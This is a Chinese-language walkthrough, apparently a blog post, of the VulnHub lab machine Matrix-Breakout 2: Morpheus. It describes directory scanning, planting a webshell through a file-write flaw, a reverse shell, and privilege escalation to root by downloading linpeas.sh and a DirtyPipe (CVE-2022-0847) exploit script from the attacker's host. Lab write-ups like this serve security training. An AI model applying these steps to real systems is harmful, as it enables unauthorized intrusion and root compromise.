VulnHub MATRIX-BREAKOUT: 2 MORPHEUS wp

靶机下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

下载后拖入VMware打开,然后和kali都设置成nat网络模式,在kali上arp扫出靶机ip然后扫描端口,发现开了80端口,直接去web搜集信息。在这里插入图片描述

在这里插入图片描述
并没有有用的信息,robots.txt也没有有用的信息。然后进行目录扫描,一开始用的dirsearch,没扫出有用的东西,又用了gobuster去扫描。字典来自kali机的/usr/share/wordlists/dirbuster目录
在这里插入图片描述
扫到一个php文件。在这里插入图片描述
发现存在写任意文件漏洞,用hackbar直接写webshell,然后蚁剑连接。在这里插入图片描述
在这里插入图片描述
然后创建py脚本进行shell反弹在这里插入图片描述
并获取一个标准shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
成功拿到靶机shell,但是是低权限。
翻翻文件发现根目录有一个FLAG.txt
在这里插入图片描述
图片也下载下来了,然后就不知道怎么弄了,也没搜集到啥信息。那还是继续关注提权吧。这里有一个很厉害的内网扫描脚本 linpeas.sh,可以扫描漏洞等等。

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

直接wget下载到靶机,然后赋权运行在这里插入图片描述
会扫描出漏洞,我们是用DirtyPipe进行提权。可以先下载到kali上

git clone https://github.com/imfiver/CVE-2022-0847.git

然后用靶机进行下载。

wget http://192.168.243.129/CVE-2022-0847/Dirty-Pipe.sh

赋权运行直接就拿到root权限了。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值